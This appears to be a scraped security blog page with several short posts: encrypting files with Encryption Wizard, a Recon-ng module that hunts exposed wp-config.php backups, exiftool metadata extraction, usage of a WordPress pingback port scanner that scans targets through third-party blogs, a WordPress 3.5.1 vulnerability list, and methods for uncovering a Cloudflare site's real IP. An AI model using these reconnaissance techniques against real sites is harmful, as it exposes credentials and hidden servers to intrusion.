How to encrypt sensitive data?

<div dir="ltr" style="text-align: left;" trbidi="on">Encryption Wizard (EW) is a simple, strong, Java file and folder encryptor for protection of sensitive information (FOUO, Privacy Act, CUI, etc.). EW encrypts all file types for data-at-rest and data-in-transit protection. Without installation or elevated privileges, EW runs on Windows, Mac, Linux, Solaris, and other computers with Sun Java. <br /><br />Backtrack 5 has already come with ewizard ; it `s located in the /pentest/misc/ewizard . But it`s not latest version so we have to download latest version<br /><br />Download Ew-public from <a href="http://spi.dod.mil/ewizard.htm" target="_blank">here</a><br /><br />Extract zip file where you can see one java file ; & ewizard user manual which contained all information about how to use it to encrypt & decrypt your private data.<br /><br />For linux user<br />java -jar EW-Public-3.3.5.jar<br /><br />For windows user double click on jar file & you can also install from tools & click on install<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgtsynPVOZd6sucvKn_EgpGMBxH-0O8EqM89m7iNLnNvHSaBl4WM5KF_SWkjv94TOd0yMP13nJIwZkFsONrABiTFTg05G_sX8-87jpWr2OqPvpWojD6XIyPZarooc0MFYBA6hrYwwlRgJn/s1600/ewizard.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="encrypt_data" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgtsynPVOZd6sucvKn_EgpGMBxH-0O8EqM89m7iNLnNvHSaBl4WM5KF_SWkjv94TOd0yMP13nJIwZkFsONrABiTFTg05G_sX8-87jpWr2OqPvpWojD6XIyPZarooc0MFYBA6hrYwwlRgJn/s320/ewizard.jpeg" title="Encryption wizard" width="318" /></a></div><div class="separator" style="clear: both; text-align: center;"></div>It open Encryption wizard.Now click on file menu & add folder or file to encrypt.<br /><br /><br /><br /><br /><span id="goog_354956284"></span> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW8ioU0wPfnYMC1fhyLgP1wpFY4KVZ5jw3WZOpeLKgWFenE7GdRZsuYk-xoHzazMfcMjFmCAl4ToYVjIS4G_3gX2m5uUrlw_RELunTR7-zIv4gqvTezaA_djnIRCB07ZCDgO1s0dRTp4Pf/s1600/ewizard_1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="encrypt_data" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW8ioU0wPfnYMC1fhyLgP1wpFY4KVZ5jw3WZOpeLKgWFenE7GdRZsuYk-xoHzazMfcMjFmCAl4ToYVjIS4G_3gX2m5uUrlw_RELunTR7-zIv4gqvTezaA_djnIRCB07ZCDgO1s0dRTp4Pf/s320/ewizard_1.jpeg" title="ewizard" width="314" /></a></div><span id="goog_354956285"></span><br /><a name='more'></a><br /><br />Now add file & enter passphrase . You can also enter certificates; metadata . You can also generate password which show in last tab.<br /><br />Now your file is encrypted.<br /><br />To decrypt, drag the .wzd / .wza file into Encryption Wizard and select ‘Decrypt’. & enter your passphrase.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHfRyrTeCXHzvzkTLb3wdm5Hdec4S7UebtM-p9LLFOVH3WEun0NDIU-h9w63dR4doc-9nRlvkAX5NlsRcJRQbxSIfmYrG4eSj24JokCgrIbgyzGlhkFytMvyMhLx0f_38trigSPnqpgM8W/s1600/ewizard_2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="encrypt_data" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHfRyrTeCXHzvzkTLb3wdm5Hdec4S7UebtM-p9LLFOVH3WEun0NDIU-h9w63dR4doc-9nRlvkAX5NlsRcJRQbxSIfmYrG4eSj24JokCgrIbgyzGlhkFytMvyMhLx0f_38trigSPnqpgM8W/s320/ewizard_2.jpeg" title="ewizard" width="313" /></a></div></div>

How to encrypt sensitive data?

Encryption Wizard (EW) is a simple, strong, Java file and folder encryptor for protection of sensitive information (FOUO, Privacy Act, CUI, ...

+ Read more »

Recon-ng Framework A Quick Intro

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXm8YcPHeAS57Y70pTXKZ4hh3Ews9FciBHFbTgwQuComiHyjucOalSAn74M9ngDjgrZ5c8sIzUuYhV3FE2Sqh4EBuXgPY8CpZ3DO49uqpN92Gp119pyH8SDc411QrdRPDcxXr8VFKACIM/s1600/1_0_440_http---i.haymarket.net.au-News-python.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXm8YcPHeAS57Y70pTXKZ4hh3Ews9FciBHFbTgwQuComiHyjucOalSAn74M9ngDjgrZ5c8sIzUuYhV3FE2Sqh4EBuXgPY8CpZ3DO49uqpN92Gp119pyH8SDc411QrdRPDcxXr8VFKACIM/s320/1_0_440_http---i.haymarket.net.au-News-python.jpg" width="320" /></a></div><span style="text-align: justify;"><span id="goog_1201155913"></span><span id="goog_1201155914"></span><br /></span><span style="text-align: justify;">Recon-ng is an open-source framework coded in python by Tim Tomes a.k.a LaNMaSteR53. Its interface is modeled after the look of the Metasploit Framework but it is not meant for exploitation or for spawning a meterpreter session or a shell, it is for web-based reconnaissance and information gathering. It comes with modules to support your web reconnaissance adventure and information gathering just like Metasploit's auxiliary and exploit modules. Modules are categorized into Discovery, Experimental, Recon and Reporting.</span><br /><a name='more'></a><span style="text-align: justify;">As of this writing here are the modules with its subcategories:</span><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;"></div><b>Discovery</b><br />---------<br />discovery/exploitable/http/<wbr></wbr>dnn_fcklinkgallery<br />discovery/exploitable/http/<wbr></wbr>generic_restaurantmenu<br />discovery/exploitable/http/<wbr></wbr>webwiz_rte<br />discovery/info_disclosure/dns/<wbr></wbr>cache_snoop<br />discovery/info_disclosure/<wbr></wbr>http/backup_finder<br />discovery/info_disclosure/<wbr></wbr>http/google_ids<br />discovery/info_disclosure/<wbr></wbr>http/interesting_files<br /><br /><b> Experimental</b><br />------------<br />experimental/rce<br /><br /><b>Recon</b><br />-----<br />recon/contacts/enum/http/web/<wbr></wbr>dev_diver<br />recon/contacts/enum/http/web/<wbr></wbr>namechk<br />recon/contacts/enum/http/web/<wbr></wbr>pwnedlist<br />recon/contacts/enum/http/web/<wbr></wbr>should_change_password<br />recon/contacts/gather/http/<wbr></wbr>api/jigsaw/point_usage<br />recon/contacts/gather/http/<wbr></wbr>api/jigsaw/purchase_contact<br />recon/contacts/gather/http/<wbr></wbr>api/jigsaw/search_contacts<br />recon/contacts/gather/http/<wbr></wbr>api/linkedin_auth<br />recon/contacts/gather/http/<wbr></wbr>api/twitter<br />recon/contacts/gather/http/<wbr></wbr>api/whois_pocs<br />recon/contacts/gather/http/<wbr></wbr>web/jigsaw<br />recon/contacts/gather/http/<wbr></wbr>web/pgp_search<br />recon/contacts/support/add_<wbr></wbr>contact<br />recon/contacts/support/mangle<br />recon/creds/enum/http/api/<wbr></wbr>leakdb<br />recon/creds/enum/http/api/<wbr></wbr>noisette<br />recon/creds/gather/http/api/<wbr></wbr>pwnedlist/account_creds<br />recon/creds/gather/http/api/<wbr></wbr>pwnedlist/api_usage<br />recon/creds/gather/http/api/<wbr></wbr>pwnedlist/domain_creds<br />recon/creds/gather/http/api/<wbr></wbr>pwnedlist/domain_ispwned<br />recon/creds/gather/http/api/<wbr></wbr>pwnedlist/leak_lookup<br />recon/creds/gather/http/api/<wbr></wbr>pwnedlist/leaks_dump<br />recon/hosts/enum/dns/resolve<br />recon/hosts/enum/http/api/<wbr></wbr>builtwith<br />recon/hosts/enum/http/api/<wbr></wbr>punkspider<br />recon/hosts/enum/http/api/<wbr></wbr>wascompanyhacked<br />recon/hosts/enum/http/api/<wbr></wbr>whatweb<br />recon/hosts/enum/http/api/<wbr></wbr>whois_lookup<br />recon/hosts/enum/http/web/age_<wbr></wbr>analyzer<br />recon/hosts/enum/http/web/<wbr></wbr>asafaweb<br />recon/hosts/enum/http/web/<wbr></wbr>gender_analyzer<br />recon/hosts/enum/http/web/<wbr></wbr>ipvoid<br />recon/hosts/enum/http/web/<wbr></wbr>malwaredomain<br />recon/hosts/enum/http/web/<wbr></wbr>mywot<br />recon/hosts/enum/http/web/<wbr></wbr>netbios<br />recon/hosts/enum/http/web/<wbr></wbr>netcraft_history<br />recon/hosts/enum/http/web/<wbr></wbr>open_resolvers<br />recon/hosts/enum/http/web/<wbr></wbr>urlvoid<br />recon/hosts/enum/http/web/web_<wbr></wbr>archive<br />recon/hosts/enum/http/web/<wbr></wbr>xssed<br />recon/hosts/gather/dns/brute_<wbr></wbr>force<br />recon/hosts/gather/http/api/<wbr></wbr>bing_ip<br />recon/hosts/gather/http/api/<wbr></wbr>google_site<br />recon/hosts/gather/http/api/<wbr></wbr>shodan_hostname<br />recon/hosts/gather/http/web/<wbr></wbr>baidu_site<br />recon/hosts/gather/http/web/<wbr></wbr>bing_site<br />recon/hosts/gather/http/web/<wbr></wbr>census_2012<br />recon/hosts/gather/http/web/<wbr></wbr>google_site<br />recon/hosts/gather/http/web/<wbr></wbr>ip_neighbor<br />recon/hosts/gather/http/web/<wbr></wbr>mcafee/mcafee_affil<br />recon/hosts/gather/http/web/<wbr></wbr>mcafee/mcafee_dns<br />recon/hosts/gather/http/web/<wbr></wbr>mcafee/mcafee_mail<br />recon/hosts/gather/http/web/<wbr></wbr>netcraft<br />recon/hosts/gather/http/web/<wbr></wbr>yahoo_site<br />recon/hosts/geo/http/api/<wbr></wbr>hostip<br />recon/hosts/geo/http/api/<wbr></wbr>ipinfodb<br />recon/hosts/geo/http/api/<wbr></wbr>maxmind<br />recon/hosts/geo/http/api/<wbr></wbr>uniapple<br />recon/hosts/geo/http/web/wigle<br />recon/hosts/support/add_host<br /><br /><b>Reporting</b><br />---------<br />reporting/csv_file<br />reporting/html_report<br />reporting/list<br /><br /><div style="text-align: justify;">I am also one of the contributors for this framework and has contributed mostly to the Discovery modules.</div><div style="text-align: justify;"><br /></div><div style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qSycOoCkoZ0/Uez9qigm23I/AAAAAAAAAss/f1_GJQr7TNg/s1600/recon-ng.png" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="392" src="http://1.bp.blogspot.com/-qSycOoCkoZ0/Uez9qigm23I/AAAAAAAAAss/f1_GJQr7TNg/s640/recon-ng.png" width="577" /></a></div><div style="text-align: justify;"><br /></div>In this article I'm going to emphasize the Backup File Finder module which I authored together with Tim Tomes (the main developer of Recon-ng). This module can be used for checking specific hosts for exposed backup files. The default configuration searches for wp-config.php files which contain WordPress database configuration information.<br /><br />As a side note, this module is inspired by cmsploit.<br /><br /><b>Basic Usage:</b><br /><b><br /></b>load discovery/info_disclosure/<wbr></wbr>http/backup_finder (use the module)<br /><br />show options (shows the options that can be set for the module)<br /><br />set source <a href="http://target.com/" target="_blank">target.com</a> (the host you want to crawl)<br /><br />set uri config_file (configuration file you want to check, ex. wp-config.php)<br /><br />Here is the screenshot of the Backup File Finder's actual crawling.<br /><br /><div style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-2fVYb02icj8/UfSCMLGMNqI/AAAAAAAAAtA/wda3IzeYnuA/s1600/finder.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="441" src="http://2.bp.blogspot.com/-2fVYb02icj8/UfSCMLGMNqI/AAAAAAAAAtA/wda3IzeYnuA/s640/finder.jpg" width="577" /></a></div><br />Now, here is what's inside in a typical configuration file:<br /><br /><br /><i>define('DB_NAME', 'wordpress');</i><br /><i><br /></i><i>/** MySQL database username */</i><br /><i>define('DB_USER', 'root');</i><br /><i><br /></i><i>/** MySQL database password */</i><br /><i>define('DB_PASSWORD', 'passwd');</i><br /><i><br /></i><i>/** MySQL hostname */</i><br /><i>define('DB_HOST', 'localhost');</i><br /><i><br /></i><i>/** Database Charset to use in creating database tables. */</i><br /><i>define('DB_CHARSET', 'utf8');</i><br /><i><br /></i><i>/** The Database Collate type. Don't change this if in doubt. */</i><br /><i>define('DB_COLLATE', '');</i><br /><i><br /></i>List of the various configuration files used by popular CMS' which can be set to the option <i>uri</i>:<br /><br /><i>wp-config.php >> WordPress</i><br /><i>config.php >> phpBB, ExpressionEngine</i><br /><i>configuration.php >> Joomla</i><br /><i>LocalSettings.php >>MediaWiki</i><br /><i>mt-config.cgi >> Movable Type</i><br /><i>settings.php >> Drupal</i><br /><b><br /></b> <iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/PcWWsNgXtLg?feature=player_embedded" width="577"></iframe> <b>About The Author</b><br /><b><br /></b>This article has been written by Jay Turla, he is a security researcher at Infosec, along with security research he also performs vulnerability research too.<br /><br /><b>Resources:</b><br /><a href="https://bitbucket.org/LaNMaSteR53/recon-ng" rel="nofollow" target="_blank">https://bitbucket.org/<wbr></wbr>LaNMaSteR53/recon-ng</a><br /><a href="http://resources.infosecinstitute.com/the-recon-ng-framework-automated-information-gathering/" rel="nofollow" target="_blank">http://resources.<wbr></wbr>infosecinstitute.com/the-<wbr></wbr>recon-ng-framework-automated-<wbr></wbr>information-gathering/</a><br /><a href="http://feross.org/cmsploit/" rel="nofollow" target="_blank">http://feross.org/cmsploit/</a></div>

Recon-ng Framework A Quick Intro

Recon-ng is an open-source framework coded in python by Tim Tomes a.k.a LaNMaSteR53. Its interface is modeled after the look of the Metasplo...

+ Read more »

Extract metadata from file in Backtrack

<div dir="ltr" style="text-align: left;" trbidi="on">Metadata is stored in any document by authoring application which can be user-name ; comment ;creation date;modification date.Metadata is very important in computer Forensic ; well know hacker group Anonymous `s members are arrested due to metadata. Because they upload document without clearing metadata ; so by reading metadata we can find lots of juicy information.<br /><br /><br />Previous we saw how we can extract metadata using <a href="http://tipstrickshack.blogspot.com/2013/07/information-gathering-using-foca.html" target="_blank">FOCA</a> from website ; But we can also extract metadata from BACKTRACK using exiftool.<br /><br />If you want to write your own python script then visit our new section of blog <a href="http://pentesterscript.wordpress.com/2013/07/28/extract-metadat-from-pdf-file-using-python-script/" target="_blank">script</a> .<br /><br />Exiftool can extract metadata from images ;documents ,videos etc.Most of file format are supported in exiftool. EXIFTOOL can also write metadata into Documents. So before uploading document remove metadata from it <br /><br />How to use?<br />(1)If you are not using backtrack than you can download from git. For ubuntu user type following command in terminal.<br />git clone https://github.com/pandastream/libimage-exiftool-perl-9.27.git exiftool<br />sudo apt-get install libarchive-zip-perl<br /><br />(2)cd exiftool<br />(3)./exiftool /path of file.<br /><br />Extract metadata from pdf file:-<br /><br />./exiftool /path of pdf file<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWbFZTTkWvRttfdKXkiPTpK7woUNI9gljBGuRkARH1K-B0jM_PP17KCa5D_l5oLJwK_RIeccbD-sIK8m3vYviUahrMTLg505OFv9Ap4tTtONV10yTuTE34Pk0Pt6yXx-F9KPLE-eo3ew0x/s1600/metadata.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="exiftool-metadata" border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWbFZTTkWvRttfdKXkiPTpK7woUNI9gljBGuRkARH1K-B0jM_PP17KCa5D_l5oLJwK_RIeccbD-sIK8m3vYviUahrMTLg505OFv9Ap4tTtONV10yTuTE34Pk0Pt6yXx-F9KPLE-eo3ew0x/s400/metadata.jpeg" title="metadata_exiftool" width="400" /></a></div><br /><a name='more'></a><br /></div>

Extract metadata from file in Backtrack

Metadata is stored in any document by authoring application which can be user-name ; comment ;creation date;modification date.Metadata is ve...

+ Read more »

Wordpress Pingback Port Scanner

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><h1 class="western"><span style="font-weight: normal;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">WordpressPingbackPortScanner</span></span></span></h1><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">Wordpress exposes a so called Pingback API to link to other blogposts. Using this feature you can scan other hosts on the intra- or internet via this server. You can also use this feature for some kind of distributed port scanning: You can scan a single host using multiple Wordpress Blogs exposing this API. This issue was fixed in Wordpress 3.5.1. Older versions are vulnerable, if the XML-RPC Interface is active.</span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">(1)Download from <a href="https://github.com/FireFart/WordpressPingbackPortScanner/archive/master.zip" target="_blank">here</a></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">(2)Extract it in folder</span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">(3)cd Downloads/WordpressPingbackPortScanner-master/ </span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">(4)It does not work default ruby version which is 1.9.2 ; so by running update-alternatives we can change ruby version to 1.8.2</span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">update-alternatives --config ruby </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">select 1</span></span></div><div style="margin-bottom: 0in;"><br /><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">(5)</span></span><br /><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">gem install bundler</span></span><br /><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">bundle install </span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIbGv5RQfTSOXndYH8NUJ7tRdqS-YlL7qhF1RcNlIpc4x_cLH1QwdY1s95YFaDHMYkwjL18MRsilLty7tNofWJVjkEqkEmS9txlAZV0eueSZf7BBc28W_6CBuRjkuTmGA34XLUNhgO9UjA/s1600/ping_back_port_scanner.jpeg" imageanchor="1"><img alt="wordpress-pingback-port-scanner" border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIbGv5RQfTSOXndYH8NUJ7tRdqS-YlL7qhF1RcNlIpc4x_cLH1QwdY1s95YFaDHMYkwjL18MRsilLty7tNofWJVjkEqkEmS9txlAZV0eueSZf7BBc28W_6CBuRjkuTmGA34XLUNhgO9UjA/s400/ping_back_port_scanner.jpeg" title="wordpress_pingback_port_scanner" width="400" /></a></div><pre class="western" style="margin-bottom: 0.2in;"><code class="western"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;"> Use:-<br /><br />Quick-scan a target via a blog:<br /><br />ruby wppps.rb -t http://www.target.com http://www.myblog.com/<br /><br />Use multiple blogs to scan a single target:<br /><br />ruby wppps.rb -t http://www.target.com http://www.myblog1.com/ http://www.myblog2.com/ http://www.myblog3.com/<br /><br />Scan a free wordpress.com blog (all ports) from the internal network:<br /><br />ruby wppps.rb -a -t http://localhost http://myblog.wordpress.com/<br /></span></span></code></pre><div style="margin-bottom: 0in;"></div><a name='more'></a></div>

Wordpress Pingback Port Scanner

WordpressPingbackPortScanner Wordpress exposes a so called Pingback API to link to other blogposts. Using this feature you can scan other ho...

+ Read more »

List of vulnerability in wordpress 3.5.1.

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">Recently true-caller and Tango messenger is hacked by Syrian-Electronic-Army.</span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">And large amount of Database has been stolen. Now what is common in these sites?</span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;">They have word-press 3.5.1 which is vulnerable to some attack.</span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><br /></div><span style="font-size: medium;">A weakness and multiple vulnerabilities have been reported in WordPress, which can be exploited by malicious users to disclose certain system information and bypass certain security restrictions and by malicious people to conduct spoofing and cross-site scripting attacks, bypass certain security restrictions, and cause a DoS (Denial of Service).<br /><br />1) An error when calculating the hash cycle count within the "crypt_private()" method in /wp-includes/class-phpass.php can be exploited to exhaust CPU and memory resources by sending HTTP requests with a specially crafted password cookie.<br /><br />Successful exploitation of this vulnerability requires knowledge of the URL for a password-protected post.<br /><br />This vulnerability is confirmed in version 3.5.1. Prior versions may also be affected.</span><br /><br /><br /><div style="margin-bottom: 0in;"><span style="font-size: medium;">Here is full details & exploitation is available ;visit this link.</span></div><div style="margin-bottom: 0in;"><span style="font-size: medium;"><a href="https://vndh.net/note:wordpress-351-denial-service">https://vndh.net/note:wordpress-351-denial-service</a></span></div><span style="font-size: medium;"><br />2) An unspecified error within the HTTP API related to server-side requests can be exploited to gain access to the site.</span><br /><div style="margin-bottom: 0in;"><span style="font-size: medium;">Here is full details.</span></div><span style="font-size: medium;"><a href="http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html">http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html</a></span><br /><span style="font-size: medium;"><br />3) An unspecified error can be exploited to bypass certain restrictions when publishing posts.<br /><br />Successful exploitation requires the "Contributor" role.<br /><br />4) An unspecified error can be exploited to reassign the post authorship.<br /><br />5) Certain input related to SWFUpload is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.</span><br /><a name='more'></a><span style="font-size: medium;"><br />6) Certain input related to Flash applet within TinyMCE Media Plugin is not properly verified before being used. This can be exploited to e.g. spoof unspecified content.<br /><br />7) Certain input related to media uploading is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.<br /><br />8) An error when handling failed uploads can be exploited to disclose the full installation path.</span></div>

List of vulnerability in wordpress 3.5.1.

Recently true-caller and Tango messenger is hacked by Syrian-Electronic-Army. And large amount of Database has been stolen. Now what is com...

+ Read more »

Bypassing Cloudflare - Attack-Secure Challenge Writeup!

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCTVf_barNY8WNvaMn7oiBFG9vL7f7RRM8Jy-QsEdwhJXf6jZhwPtdN3N_UwStGP9nBecL0Ua9C7lp-6oNNxQAzbMHvQh8Gkck5AB2aA67r2of2IO8i3U-JAx1ZQFrPfDuezuXpuECxPI/s1600/cfhome2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCTVf_barNY8WNvaMn7oiBFG9vL7f7RRM8Jy-QsEdwhJXf6jZhwPtdN3N_UwStGP9nBecL0Ua9C7lp-6oNNxQAzbMHvQh8Gkck5AB2aA67r2of2IO8i3U-JAx1ZQFrPfDuezuXpuECxPI/s1600/cfhome2.gif" /></a></div><br />Few days back we setup a small and interesting challenge for RHA readers, the main goal of the challenge was to find the <u>hosting provider</u> and the <u>real iP address</u> of the attack-secure.com. Since attack-secure.com is running cloudflare which acts as a reverse proxy the nameservers and the target iP address would be replaced with the one of cloudflare when ever you try to communicate with the servers. So let's talk about some of the ways we can solve this challenge, we are disclosing some of the ways that could be used to solve this challenge.<br /><b><u></u></b><br /><a name='more'></a><b><u>Bypassing Cloudflare - Method 1</u></b><br /><br />The first method involves the using a website that maintain records of websites using cloudflare, it contains list of around 381,314 domains that have recently shifted to cloudflare and they are actively testing it. The website is called as <b><u>cloudflare-watch.org</u></b>. The guys are cloudflare watch believe that cloudflare was started for a purpose of helping bad guys such as hackers, ddosers, copyright pirates. Here is what they write on their homepage:<br /><br />"<u><i>CloudFlare is a venture-funded startup that routes around Internet abuse by acting as a reverse proxy. They also encourage illegality by allowing hackers, DDoSers, cyberbullies, and copyright pirates to hide behind their servers.</i></u>"   <br /><br />All you need to go to the url below and type your domain name and click on search:<br /><a href="http://www.cloudflare-watch.org/cfs.html">http://www.cloudflare-watch.org/cfs.html</a><br /><br /><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4c0vfd8CCMBhqgXJ8HVZMk08LTM1e7wbWIGG8QUUYA9AAKpyuVQ1-iX8qwL3CQtNsz0Adhmrwh90gsBalcr6faDS2zLvadCvMBuFr43R1f3f9rSWYKAV5ur6Smx_MJuS1uvP8wvMtKsg/s1600/asfsa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4c0vfd8CCMBhqgXJ8HVZMk08LTM1e7wbWIGG8QUUYA9AAKpyuVQ1-iX8qwL3CQtNsz0Adhmrwh90gsBalcr6faDS2zLvadCvMBuFr43R1f3f9rSWYKAV5ur6Smx_MJuS1uvP8wvMtKsg/s640/asfsa.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">A direct iP connect was found inside the database, if you compare this IP address with the ip address that we get while we ping the website, it's different. </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLTnFr0Usph_4ngF0Z0KsTIUpzpBST9Mi9w-v1L_vYXqJpuvt7QoRKxMr5-3hJmtPo0_TUWjTZO2sAfAqzhrQtVjmr0WLYxmiwTBTtjE553td9SEuLrs8q5auhcGRlrJce7SYYW3iaRkA/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLTnFr0Usph_4ngF0Z0KsTIUpzpBST9Mi9w-v1L_vYXqJpuvt7QoRKxMr5-3hJmtPo0_TUWjTZO2sAfAqzhrQtVjmr0WLYxmiwTBTtjE553td9SEuLrs8q5auhcGRlrJce7SYYW3iaRkA/s640/Untitled.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div>On navigating to the following address "<b>http://199..47.222.125</b>", we find that this particular web server belongs to page.ly which is the real webhosting company for attack-secure.com<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQfyOtvRlODrQ2uFNKoIoJuofkgCNbtETuxDyeo8U5MrP8DanogMV4kTNjECRVBITb4Ddbbo6hyphenhyphenuJ7bGPS2Io7-JaHczhamk7z8c7gWqWafUZUMx-qm9-70E_iDGYy4prWV4HbsbKBnOw/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQfyOtvRlODrQ2uFNKoIoJuofkgCNbtETuxDyeo8U5MrP8DanogMV4kTNjECRVBITb4Ddbbo6hyphenhyphenuJ7bGPS2Io7-JaHczhamk7z8c7gWqWafUZUMx-qm9-70E_iDGYy4prWV4HbsbKBnOw/s640/Untitled.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b><u>Bypassing Cloudflare Method 2</u></b></div><div class="separator" style="clear: both; text-align: left;"><b><u><br /></u></b></div><div class="separator" style="clear: both; text-align: left;">The second method is one of the best methods specially to figure out the real ip of forums who are using cloudflare. The idea behind this method to register on a forum or any where that allows registrations, since cloudflare does not handles mx records it is possible for us to find out the real iP by email headers. One of our winners have sent us a video on how he utilized this method to solve the challenge:</div><iframe allowfullscreen="" frameborder="0" height="300" mozallowfullscreen="" src="http://player.vimeo.com/video/70763112" webkitallowfullscreen="" width="577"></iframe> <br /><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b>Winners</b></div><div class="separator" style="clear: both; text-align: left;"><b><br /></b></div><div class="separator" style="clear: both; text-align: left;">We received hundred's of submission and most of the people were sending the cloudflare iP instead of the real one. We would like to congratulate the following people for solving our challenge:</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b>1)</b> <u><b>Haider Qureshi</b> </u>(Solved first) (Utilized the second method)</div><div class="separator" style="clear: both; text-align: left;"><b>2)</b> <b><u>Aamir Rehman</u> </b>(Utilized the second method)</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">There are ofcourse other methods such as resolving real iP by subdomains and by using mx records, We might talk about them in upcoming articles. </div></div>

Bypassing Cloudflare - Attack-Secure Challenge Writeup!

Few days back we setup a small and interesting challenge for RHA readers, the main goal of the challenge was to find the hosting provider a...

+ Read more »

How to solve metasploit problem in SET?

